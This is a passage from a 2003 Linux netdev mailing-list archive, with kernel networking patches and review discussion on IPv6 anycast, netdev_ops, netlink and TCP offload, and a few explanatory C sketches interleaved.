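static bool ex_usable_as_unicast(int type)
{
	return (type & EX_ADDR_UNICAST) != 0;
}
```

Callers that compare the type for equality with the unicast value, rather than testing the bit, would behave differently, so such comparisons are worth checking when reviewing a change of this kind.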
Thanks, MikaL --=-z/elxEQiE2HR9qGdA6GJ Content-Disposition: attachment; filename=2.5.75-anycast.udiff Content-Type: text/x-patch; name=2.5.75-anycast.udiff; charset=ISO-8859-15 Content-Transfer-Encoding: quoted-printable
diff -ur orig/linux-2.5.75/net/ipv6/addrconf.c linux-2.5.75/net/ipv6/addrconf.c
--- orig/linux-2.5.75/net/ipv6/addrconf.c	2003-07-10 23:14:49.000000000 +0300
+++ linux-2.5.75/net/ipv6/addrconf.c	2003-07-12 10:01:57.000000000 +0300
@@ -208,16 +208,15 @@
 				break;
 		};
 		return type;
-	}
+	} else
+		type = IPV6_ADDR_UNICAST;
+
 	/* check for reserved anycast addresses */
-	
 	if ((st & htonl(0xE0000000)) &&
 	    ((addr->s6_addr32[2] == htonl(0xFDFFFFFF) &&
 	    (addr->s6_addr32[3] | htonl(0x7F)) == (u32)~0) ||
 	    (addr->s6_addr32[2] == 0 && addr->s6_addr32[3] == 0)))
-		type = IPV6_ADDR_ANYCAST;
-	else
-		type = IPV6_ADDR_UNICAST;
+		type |= IPV6_ADDR_ANYCAST;
 
 	/* Consider all addresses with the first three bits different of
 	   000 and 111 as finished.
--=-z/elxEQiE2HR9qGdA6GJ-- From jgarzik@pobox.com Sat Jul 12 10:24:48 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 12 Jul 2003 10:25:26 -0700 (PDT) Received: from www.linux.org.uk (IDENT:p8IVHij2EXDoJU90FZ48wJG5lCKwF35U@parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6CHO72x007439 for ; Sat, 12 Jul 2003 10:24:48 -0700 Received: from rdu26-227-011.nc.rr.com ([66.26.227.11] helo=pobox.com) by www.linux.org.uk with esmtp (Exim 4.14) id 19b5GU-0007my-Jt; Fri, 11 Jul 2003 22:17:14 +0100 Message-ID: <3F0F294F.4060804@pobox.com> Date: Fri, 11 Jul 2003 17:17:03 -0400 From: Jeff Garzik Organization: none User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.2.1) Gecko/20021213 Debian/1.2.1-2.bunk X-Accept-Language: en MIME-Version: 1.0 To: Matthew Wilcox CC: netdev@oss.sgi.com Subject: Re: [PATCH] Move eth_mac_addr and eth_change_mtu References: <20030711181946.GG20424@parcelfarce.linux.theplanet.co.uk> <20030711182330.GC16037@gtf.org>
<20030711182530.GH20424@parcelfarce.linux.theplanet.co.uk> <3F0F24B1.5050200@pobox.com> <20030711210522.GM20424@parcelfarce.linux.theplanet.co.uk> In-Reply-To: <20030711210522.GM20424@parcelfarce.linux.theplanet.co.uk> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3982 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev Matthew Wilcox wrote: > On Fri, Jul 11, 2003 at 04:57:21PM -0400, Jeff Garzik wrote: > >>Well, I don't see/understand this next-stage, so elaboration would be >>nice. As-is, I do not support merging this patch. > > > It's the next stage you're calling for -- move these functions: > > dev->change_mtu = eth_change_mtu; > dev->hard_header = eth_header; > dev->rebuild_header = eth_rebuild_header; > dev->set_mac_address = eth_mac_addr; > dev->hard_header_cache = eth_header_cache; > dev->header_cache_update= eth_header_cache_update; > dev->hard_header_parse = eth_header_parse; > > into netdev_ops. Which means each driver will need to see them. Drivers don't need to see them now, they shouldn't need to see them after netdev_ops. It's hidden by ether_setup. > I thought I could justify moving these functions already on the grounds > that if you were looking for the definition of eth_change_mtu(), > net_init.c would be a much less likely place to look than > net/ethernet/eth.c If you're gonna do that, move all of ether_setup, alloc_etherdev, etc. Don't just move two out of ~10 functions. 
Jeff From khc@pm.waw.pl Sat Jul 12 11:23:21 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 12 Jul 2003 11:23:58 -0700 (PDT) Received: from hq.pm.waw.pl (hq.pm.waw.pl [195.116.170.10]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6CIMa2x008155 for ; Sat, 12 Jul 2003 11:23:20 -0700 Received: by hq.pm.waw.pl (Postfix, from userid 10) id 61C28322F; Sat, 12 Jul 2003 20:22:33 +0200 (CEST) Received: by defiant.pm.waw.pl (Postfix, from userid 500) id 92DB63C7BC; Sat, 12 Jul 2003 18:03:36 +0200 (CEST) To: Cc: netdev@oss.sgi.com Subject: Logical interfaces (VLANs etc) flow control From: Krzysztof Halasa Date: 12 Jul 2003 18:03:35 +0200 Message-ID: Lines: 18 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-archive-position: 3983 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: khc@pm.waw.pl Precedence: bulk X-list: netdev Hi, probably a simple question: do we currently do any flow control for logical subinterfaces (specifically 802.1q VLANs) similar to netif_{stop,wake}_queue on the main (physical) device? I notice "txqueuelen:0" on VLAN devices and vlan_dev_hard_start_xmit() seems to not do any flow control, but I wonder if there is something else? The problem is I'm doing the same with Frame Relay, should I add a TX queue to FR PVC devices and possibly stop/wake PVC device queue in sync with physical device queue? Possibly a pointer to faq or something? 
-- Krzysztof Halasa Network Administrator From linux-netdev@gmane.org Sat Jul 12 12:13:26 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 12 Jul 2003 12:14:03 -0700 (PDT) Received: from main.gmane.org (main.gmane.org [80.91.224.249]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6CJCi2x008775 for ; Sat, 12 Jul 2003 12:13:25 -0700 Received: from root by main.gmane.org with local (Exim 3.35 #1 (Debian)) id 19bOyh-00025Y-00 for ; Sat, 12 Jul 2003 20:20:11 +0200 X-Injected-Via-Gmane: http://gmane.org/ To: netdev@oss.sgi.com Received: from news by main.gmane.org with local (Exim 3.35 #1 (Debian)) id 19bNoy-0006za-00 for ; Sat, 12 Jul 2003 19:06:04 +0200 From: Jan Rychter Subject: Re: networking bugs and bugme.osdl.org Date: Sat, 12 Jul 2003 10:07:42 -0700 Lines: 81 Message-ID: References: <1056755336.5459.16.camel@dhcp22.swansea.linux.org.uk> <20030627.172123.78713883.davem@redhat.com> <1056827972.6295.28.camel@dhcp22.swansea.linux.org.uk> <20030628.150328.74739742.davem@redhat.com> Mime-Version: 1.0 Content-Type: multipart/signed; boundary="=-=-="; micalg=pgp-sha1; protocol="application/pgp-signature" X-Complaints-To: usenet@main.gmane.org X-Spammers-Please: blackholeme@rychter.com User-Agent: Gnus/5.1003 (Gnus v5.10.3) XEmacs/21.4 (Rational FORTRAN, linux) Cancel-Lock: sha1:Q5NfW1XO9gryg4flfNXqetJHZ5Y= Cc: linux-net@vger.kernel.org, linux-kernel@vger.kernel.org Cc: linux-net@vger.kernel.org, netdev@oss.sgi.com X-archive-position: 3984 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jan@rychter.com Precedence: bulk X-list: netdev --=-=-= Content-Transfer-Encoding: quoted-printable >>>>> "David" == David S Miller writes: David> From: Alan Cox Date: 28 Jun 2003 David> 20:19:32 +0100 David> On Sad, 2003-06-28 at 01:21, David S. Miller wrote: >> I respond to private reports with "please send this to the lists, >> what if I were on vacation for the next month?" 
I never actually >> process or analyze such reports. David> Which means you miss stuff. David> Not my problem Alan. If the user gives a crap about their David> report mattering, they'll do what I ask them to do. If users David> send their report to the wrong place, it will get lost, just David> like if they cat their report into /dev/null. I have no reason David> to feel bad about the information getting lost. David> If it's too much for them to do as I ask, it's too much for me David> to consider their report. [...] I think this is one of the largest problems of the current Linux development model. Many people seem to divide people into 'users' (who aren't particularly useful) and 'developers', who actually do something. People (like me), who can devote a _little_ time to narrowing down and reporting bugs fall into the 'user-whiner' class. And get ignored. What results is that you only get bug reports from active developers. Which means that rare bugs don't get fixed. David> It is not a dream, it works perfectly fine and has done so for David> 5+ years of Linux maintenance. It hasn't. The result is a system that works for you (and other active developers), but not for everyone. As an example -- try running Linux on a modern laptop, connecting some USB devices, using ACPI, or bluetooth. Observe the resulting problems and crashes. You'll hit loads of obscure bugs that have been reported, but never got looked at in detail. I certainly have hit them and reported most, and most got dropped in various places. Does this mean these are unimportant bugs? No. This does indeed mean (following your thinking) that these aren't important bugs for me. I have worked around them in various ways, some involving actually buying new hardware, or not using certain features at all. And the cycle will go on -- others will hit the bugs, report them once, see them dropped, move on. David> Let's see, what makes more sense from my perspective. 
Should I David> reward and put forth effort for the people who fart a bug report David> onto the lists and expect everyone to stop what they're doing David> and fix the bug, or should I reward and put forth effort for the David> guy who spent the time to put together a stellar bug report and David> also doesn't mind retransmitting it from time to time whilst David> everyone is busy? Interesting you should think you're 'rewarding' people. I thought your goal was to have fun working on cool software and making it better. I also thought I had the same goal as a bug-reporter. When I write software, I care about every bug report and consider people doing the reporting a very valuable resource. --J. --=-=-= Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.2 (GNU/Linux) iD8DBQA/EEBjLth4/7/QhDoRAra7AKDtnJwjGSrjhkFYu4jPKWcdBD/uagCcCl1c J0eXeqyfh5xI4A8QMxI5PkE= =MxwA -----END PGP SIGNATURE----- --=-=-=-- From jmorris@intercode.com.au Sat Jul 12 18:18:39 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 12 Jul 2003 18:19:19 -0700 (PDT) Received: from blackbird.intercode.com.au (IDENT:PsivF3FBFfmhRFGIeTcmfMF0XWh/G824@blackbird.intercode.com.au [203.32.101.10]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6D1Hu2x011710 for ; Sat, 12 Jul 2003 18:18:38 -0700 Received: from excalibur.intercode.com.au (excalibur.intercode.com.au [203.32.101.12]) by blackbird.intercode.com.au (8.11.6p2/8.9.3) with ESMTP id h6D1HZr20795; Sun, 13 Jul 2003 11:17:36 +1000 Date: Sun, 13 Jul 2003 11:17:35 +1000 (EST) From: James Morris To: "David S. 
Miller" cc: jkenisto@us.ibm.com, , , , , , , Subject: Re: [PATCH - RFC] [1/2] 2.6 must-fix list - kernel error reporting In-Reply-To: <20030711224142.557b5b5e.davem@redhat.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 3985 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jmorris@intercode.com.au Precedence: bulk X-list: netdev On Fri, 11 Jul 2003, David S. Miller wrote: > > + /* Don't bother queuing skb if kernel socket has no input function */ > > + if (nlk->pid == 0 && !nlk->data_ready) > > + goto no_dst; > > + > > Oops, turns out this doesn't work. data_ready is never NULL, look at > how netlink_kernel_create() works. It's ok: sk->data_ready is never null, but nlk_sk(sk)->data_ready will be null unless an input function is provided there. > Also, the broadcast case probably needs to be handled > too? Netlink sockets created by netlink_kernel_create() do not subscribe to any groups and are not broadcast to. > As an aside, to be honest what's so wrong with the socket receive > buffer filling up? The damage is limited to the receive buffer size > of the kernel netlink socket, but that's it. Agreed, it's not really harmful, but it's sloppy. Better to let the application know that it can't send to the socket rather than let it keep sending (with successful return codes) until the kernel socket buffer fills up. 
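The distinction drawn in this reply (the generic socket hook is always set, while the netlink-level hook is only set when an input function was supplied) can be modelled in user space. This is only a rough sketch: the struct and function names below (model_sock, model_netlink_sock, model_kernel_create, can_queue_to) are hypothetical stand-ins and not the kernel's definitions. Only the condition `pid == 0 && !data_ready` is taken from the quoted patch.

```c
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical user-space stand-ins; not the kernel's struct sock. */
struct model_sock;
typedef void (*ready_fn)(struct model_sock *sk, int len);

struct model_netlink_sock {
    unsigned int pid;     /* 0 models a kernel-owned netlink socket */
    ready_fn data_ready;  /* netlink-level hook, NULL without an input function */
};

struct model_sock {
    ready_fn data_ready;            /* generic hook, always installed */
    struct model_netlink_sock nlk;  /* models what nlk_sk(sk) would return */
};

static void default_data_ready(struct model_sock *sk, int len)
{
    (void)sk;
    (void)len;
}

/* Models socket creation: the generic hook is always set, the
 * netlink-level hook only when the caller passes an input function. */
static void model_kernel_create(struct model_sock *sk, ready_fn input)
{
    sk->data_ready = default_data_ready;
    sk->nlk.pid = 0;
    sk->nlk.data_ready = input;
}

/* Same condition as the quoted patch: refuse to queue to a kernel
 * socket that has no input function to consume the data. */
static bool can_queue_to(const struct model_sock *sk)
{
    if (sk->nlk.pid == 0 && !sk->nlk.data_ready)
        return false;
    return true;
}
```

With this model, a socket created with a NULL input function still has a non-NULL generic hook, yet can_queue_to() rejects it, which is the behaviour the reply argues for.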
- James -- James Morris From willy@www.linux.org.uk Sat Jul 12 18:53:24 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 12 Jul 2003 18:54:00 -0700 (PDT) Received: from www.linux.org.uk (IDENT:r46fv53QoBIe7CoSSmiWelpE7m7RR7rz@parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6D1qh2x012176 for ; Sat, 12 Jul 2003 18:53:24 -0700 Received: from willy by www.linux.org.uk with local (Exim 4.14) id 19b480-0005W7-18; Fri, 11 Jul 2003 21:04:24 +0100 Date: Fri, 11 Jul 2003 21:04:23 +0100 From: Matthew Wilcox To: Jeff Garzik Cc: Matthew Wilcox , netdev@oss.sgi.com, greearb@candelatech.com, "David S. Miller" , Arnaldo Carvalho de Melo Subject: Re: [PATCH] netdev_ops Message-ID: <20030711200423.GL20424@parcelfarce.linux.theplanet.co.uk> References: <20030708163042.GL23597@parcelfarce.linux.theplanet.co.uk> <3F0B2D30.4020102@candelatech.com> <20030708212551.GL1939@parcelfarce.linux.theplanet.co.uk> <20030708.150835.78728697.davem@redhat.com> <20030709161520.GW1939@parcelfarce.linux.theplanet.co.uk> <20030711193215.GH16037@gtf.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20030711193215.GH16037@gtf.org> User-Agent: Mutt/1.4.1i X-archive-position: 3986 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: willy@debian.org Precedence: bulk X-list: netdev On Fri, Jul 11, 2003 at 03:32:15PM -0400, Jeff Garzik wrote: > 1) The _ops are either too limited in scope, or too wide in scope. Couldn't agree more. I blame acme -- he wants me to push it to be much wider in scope. Let's push _all_ the function pointers into netdev_ops. But this is a mere step 1. I don't have enough network-related clout to do everything in one fell swoop. 
> 2.c) If #2 is decided to be netdev_ops, and all func ptrs are moved into > netdev_ops struct, then create the macro > SET_NETDEV_OPS(dev, ops) > > This allows full back compat, without ugliness in mainline tree. Yes, that was my preferred approach. > 3) The func ptrs _count() are totally bogus. We have an unconditional > indirect reference to a function call which does nothing but return a > driver constant. > > I personally think that having ethtool_ops members manually calling > the ->get_drvinfo hook is a _lot_ cleaner than 10,000 foo_count hooks. Disagree. I'd like to completely get rid of the ->get_drvinfo hook and have each hook return one thing. DaveM claims that these things are not always constants, and I believe him -- it's entirely possible different revs of a chip (with the same driver) may have more or fewer registers to return, for example. We might want to put these counts directly in the net_device itself and eliminate the function calls. That would make sense. > 4) I don't see why ethtool.h suddenly needs to include linux/types.h, > when it hasn't needed it in all this time until now. Otherwise you have to include before you include which sucks. No relying on other people to do your inclusions for you ;-) > 5) net/socket.c changes appear unrelated to this patch. You're right, they just happen to be in that tree. > 6) (low prio) Add documentation to > Documentation/networking/netdevices.txt. Most importantly, this > documents locking/context. An excellent idea. > 7) (low prio) All that similar code in net/core/ethtool.c can be > template-ized with a macro, IMO. Something like > DEF_ETHTOOL_GOP(get_coalesce, ETHTOOL_GCOALESCE, ethtool_coalesce); > DEF_ETHTOOL_SOP(set_coalesce, ethtool_coalesce); > (and templates for the ops that use edata) Maybe. I'm not a fan of templated ops as it makes it harder to grep. > 8) (security) get-eeprom op needs to check that offset+len is not > invalid, and does not wrap. Good idea, I'll add that check now. 
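For point 8, a minimal sketch of a range check that cannot itself wrap might look like the following. The helper name eeprom_range_ok and the eeprom_len parameter are assumptions for illustration; the 32-bit widths mirror the offset and len fields of struct ethtool_eeprom. This is not the check that was actually added to the patch.

```c
#include <stdbool.h>
#include <stdint.h>

/*
 * Returns true when the byte range [offset, offset + len) lies inside an
 * EEPROM of eeprom_len bytes. The naive test "offset + len > eeprom_len"
 * can wrap around for large inputs, so the comparison is rearranged to
 * use a subtraction that is known not to underflow.
 */
static bool eeprom_range_ok(uint32_t offset, uint32_t len, uint32_t eeprom_len)
{
    if (offset > eeprom_len)
        return false;
    return len <= eeprom_len - offset;
}
```

A request such as offset 0xFFFFFFF0 with len 0x20 would pass the naive sum test after wrapping to 0x10, but is rejected here because the offset alone already exceeds the device size.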
> 9) phys_id op should return an error, for consistency if nothing else. > It's simple for driver authors to unconditionally return 0 if their code > has no failure cases, and it's a slow path so adding the return in the > driver code is no big deal. OK, ditto. > 10) (low prio) since it's a slow path, what about replacing the switch > statement in dev_ethtool() with a lookup table? All the ethtool > commands are low numbers. If you do this, I would suggest using the gcc > array initializer syntax: > [ETHTOOL_GCOALESCE, ethtool_get_coalesce] > > All the ethtool ops have the same prototype, after all. Well, they don't have quite the same prototype ... that's part of the point -- get the type safety going as early as possible. -- "It's not Hollywood. War is real, war is primarily not about defeat or victory, it is about death. I've seen thousands and thousands of dead bodies. Do you think I want to have an academic debate on this subject?" -- Robert Fisk From davem@redhat.com Sat Jul 12 22:31:59 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 12 Jul 2003 22:32:36 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6D5VIFl019739 for ; Sat, 12 Jul 2003 22:31:59 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id WAA01455; Sat, 12 Jul 2003 22:22:22 -0700 Date: Sat, 12 Jul 2003 22:22:22 -0700 From: "David S. 
Miller" To: Jan Rychter Cc: linux-net@vger.kernel.org, linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: networking bugs and bugme.osdl.org Message-Id: <20030712222222.01089864.davem@redhat.com> In-Reply-To: References: <1056755336.5459.16.camel@dhcp22.swansea.linux.org.uk> <20030627.172123.78713883.davem@redhat.com> <1056827972.6295.28.camel@dhcp22.swansea.linux.org.uk> <20030628.150328.74739742.davem@redhat.com> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 3987 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Sat, 12 Jul 2003 10:07:42 -0700 Jan Rychter wrote: > Interesting you should think you're 'rewarding' people. I thought your > goal was to have fun working on cool software and making it > better. I also thought I had the same goal as a bug-reporter. > > When I write software, I care about every bug report and consider people > doing the reporting a very valuable resource. The whole game changes when you are stretched as thinly as I am. Scaling becomes everything, and nitpicking through vague and poorly composed bug reports is an absolute waste of my time as networking subsystem maintainer. If other people want to improve bug reports, put them into a cute usable database, and munge them along, that's fine with me. But _I_ only want to work with things that make the best use of my limited time. To be frank and honest, I do things that interest _ME_. And waddling through poorly made bug reports is anything but interesting, in fact it's frustrating work. I'd rather implement a software 802.11 stack or TCP Vegas implementation, THAT is what is a good use of my time because of my knowledge of how all these kinds of things work in the Linux networking. 
I can do things overnight that would take others weeks. Having me pillage through a bug database is a poor use of my time and capabilities. And all of my time is spent reviewing patches and dealing with the properly composed bug reports anyways, so even if I enjoyed pillaging through badly made bug reports I couldn't. People are assuming that just because _I_ don't want to work on the bad bug reports that I think nobody should. It's the exact opposite. I can't force other people to do or not do things anyways, just like everyone trying to somehow make it my "duty" to look at every single bug report cannot force me to do that. From jan@rychter.com Sat Jul 12 22:42:34 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 12 Jul 2003 22:43:08 -0700 (PDT) Received: from screech.rychter.com (screech.rychter.com [212.87.11.114]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6D5fqFl020082 for ; Sat, 12 Jul 2003 22:42:33 -0700 Received: from tnuctip.rychter.com (unknown [10.197.0.2]) by screech.rychter.com (Postfix) with ESMTP id BF06E4A605; Sun, 13 Jul 2003 07:41:34 +0200 (CEST) Received: from tnuctip.rychter.com (localhost.localdomain [127.0.0.1]) by tnuctip.rychter.com (8.12.8/8.12.8) with ESMTP id h6D5gcCY008578; Sat, 12 Jul 2003 22:42:38 -0700 Received: (from jwr@localhost) by tnuctip.rychter.com (8.12.8/8.12.8/Submit) id h6D5gcNC008576; Sat, 12 Jul 2003 22:42:38 -0700 To: "David S. Miller" Cc: linux-net@vger.kernel.org, linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: networking bugs and bugme.osdl.org In-Reply-To: <20030712222222.01089864.davem@redhat.com> (David S. 
Miller's message of "Sat, 12 Jul 2003 22:22:22 -0700") References: <1056755336.5459.16.camel@dhcp22.swansea.linux.org.uk> <20030627.172123.78713883.davem@redhat.com> <1056827972.6295.28.camel@dhcp22.swansea.linux.org.uk> <20030628.150328.74739742.davem@redhat.com> <20030712222222.01089864.davem@redhat.com> User-Agent: Gnus/5.1003 (Gnus v5.10.3) XEmacs/21.4 (Rational FORTRAN, linux) X-Spammers-Please: blackholeme@rychter.com From: Jan Rychter Date: Sat, 12 Jul 2003 22:42:36 -0700 Message-ID: MIME-Version: 1.0 Content-Type: multipart/signed; boundary="=-=-="; micalg=pgp-sha1; protocol="application/pgp-signature" X-archive-position: 3988 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jan@rychter.com Precedence: bulk X-list: netdev --=-=-= Content-Transfer-Encoding: quoted-printable >>>>> "David" == David S Miller writes: David> On Sat, 12 Jul 2003 10:07:42 -0700 David> Jan Rychter wrote: >> Interesting you should think you're 'rewarding' people. I thought >> your goal was to have fun working on cool software and making it >> better. I also thought I had the same goal as a bug-reporter. >> >> When I write software, I care about every bug report and consider >> people doing the reporting a very valuable resource. David> The whole game changes when you are stretched as thinly as I am. David> Scaling becomes everything, and nitpicking through vague and David> poorly composed bug reports is an absolute waste of my time as David> networking subsystem maintainer. [...] Couldn't agree more. Especially after having benefited from your code so much (starting back in the early sparc days...). David> Having me pillage through a bug database is a poor use of my David> time and capabilities. And all of my time is spent reviewing David> patches and dealing with the properly composed bug reports David> anyways, so even if I enjoyed pillaging through badly made bug David> reports I couldn't. 
David> People are assuming that just because _I_ don't want to work on David> the bad bug reports that I think nobody should. It's the exact David> opposite. [...] Thanks for this explanation -- I responded because I was worried you were convincing people that it's a good thing if bug reports get dropped, because the really important ones will float to the top anyway. --J. --=-=-= Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.2 (GNU/Linux) iD8DBQA/EPFOLth4/7/QhDoRAjf+AKC59JVBV7nrxiu6AhOik4DdIWAriwCeMBrV c0f29cO6CjS03BBunvl4J0Q= =0WVV -----END PGP SIGNATURE----- --=-=-=-- From davem@redhat.com Sat Jul 12 22:44:32 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 12 Jul 2003 22:45:05 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6D5hpFl020209 for ; Sat, 12 Jul 2003 22:44:32 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id WAA01514; Sat, 12 Jul 2003 22:34:49 -0700 Date: Sat, 12 Jul 2003 22:34:49 -0700 From: "David S. 
Miller" To: James Morris Cc: jkenisto@us.ibm.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, akpm@osdl.org, jgarzik@pobox.com, alan@lxorguk.ukuu.org.uk, rddunlap@osdl.org, kuznet@ms2.inr.ac.ru Subject: Re: [PATCH - RFC] [1/2] 2.6 must-fix list - kernel error reporting Message-Id: <20030712223449.550d822a.davem@redhat.com> In-Reply-To: References: <20030711224142.557b5b5e.davem@redhat.com> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 3989 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Sun, 13 Jul 2003 11:17:35 +1000 (EST) James Morris wrote: > On Fri, 11 Jul 2003, David S. Miller wrote: > > > Oops, turns out this doesn't work. data_ready is never NULL, look at > > how netlink_kernel_create() works. > > It's ok: sk->data_ready is never null, but nlk_sk(sk)->data_ready will be > null unless an input function is provided there. > > > Also, the broadcast case probably needs to be handled > > too? > > Netlink sockets created by netlink_kernel_create() do not subscribe to any > groups and are not broadcast to. Oops, you're right on both counts, I brainfarted here. I'll apply your original patch, thanks. From pekkas@netcore.fi Sun Jul 13 00:05:27 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 13 Jul 2003 00:06:00 -0700 (PDT) Received: from netcore.fi (netcore.fi [193.94.160.1]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6D74jFl021993 for ; Sun, 13 Jul 2003 00:05:27 -0700 Received: from localhost (pekkas@localhost) by netcore.fi (8.11.6/8.11.6) with ESMTP id h6D74dB20158 for ; Sun, 13 Jul 2003 10:04:40 +0300 Date: Sun, 13 Jul 2003 10:04:39 +0300 (EEST) From: Pekka Savola To: netdev@oss.sgi.com Subject: Re: disablenetwork() syscall? 
In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 3990 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: pekkas@netcore.fi Precedence: bulk X-list: netdev FWIW, DJB created a (probably biased) web page: http://cr.yp.to/unix/disablenetwork.html to describe the idea and alternatives at a bit more length. On Tue, 8 Jul 2003, James Morris wrote: > On Mon, 7 Jul 2003, Pekka Savola wrote: > > > Hi, > > > > In a bugtraq thread, DJ Bernstein brought up an idea which I'm not sure > > has been brought up in the past. > > Such a feature already exists in SELinux. > > > I'm not sure whether it's feasible or > > not, but at least it (and other methods to limit the functions of a > > user-level code) might bear consideration. > > This is precisely what LSM is for, so new security models can be > implemented without any direct effect on the core kernel. > > > - James > -- Pekka Savola "You each name yourselves king, yet the Netcore Oy kingdom bleeds." Systems. Networks. Security. -- George R.R. Martin: A Clash of Kings From davem@redhat.com Sun Jul 13 00:48:20 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 13 Jul 2003 00:48:36 -0700 (PDT) Received: from rth.ninka.net (rth.ninka.net [216.101.162.244]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6D7mJFl022499 for ; Sun, 13 Jul 2003 00:48:19 -0700 Received: from rth.ninka.net (localhost.localdomain [127.0.0.1]) by rth.ninka.net (8.12.8/8.12.8) with SMTP id h6D7mIxI009195; Sun, 13 Jul 2003 00:48:18 -0700 Date: Sun, 13 Jul 2003 00:48:18 -0700 From: "David S. 
Miller" To: "Alan Shih" Cc: linux-kernel@vger.kernel.org, linux-net@vger.kernel.org, netdev@oss.sgi.com Subject: Re: TCP IP Offloading Interface Message-Id: <20030713004818.4f1895be.davem@redhat.com> In-Reply-To: References: X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.10; i686-pc-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 3991 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Sun, 13 Jul 2003 00:33:00 -0700 "Alan Shih" wrote: > Or TOE is a forbidden discussion? TOE is evil, read this: http://www.usenix.org/events/hotos03/tech/full_papers/mogul/mogul.pdf TOE is exactly suboptimal for the very things performance matters, high connection rates. Your return is also absolutely questionable. Servers "serve" data and we offload all of the send side TCP processing that can reasonably be done (segmentation, checksumming). I've never seen an impartial benchmark showing that TCP send side performance goes up as a result of using TOE vs. the usual segmentation + checksum offloading offered today. On receive side, clever RX buffer flipping tricks are the way to go and require no protocol changes and nothing gross like TOE or weird buffer ownership protocols like RDMA requires. I've made postings showing how such a scheme can work using a limited flow cache on the networking card. I don't have a reference handy, but I suppose someone else does. And finally, this discussion belongs on the "networking" lists. Nearly all of the "networking" developers don't have time to sift through linux-kernel every day. 
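For readers unfamiliar with what "checksumming" offload in the message above covers: the work in question is the 16-bit one's-complement Internet checksum described in RFC 1071. The following is a plain software sketch of that sum, with a function name (inet_checksum) chosen here for illustration. It omits the TCP pseudo-header that a real TCP checksum also covers, and it is not taken from any driver or from the kernel.

```c
#include <stddef.h>
#include <stdint.h>

/*
 * Internet checksum over a byte buffer (RFC 1071 style).
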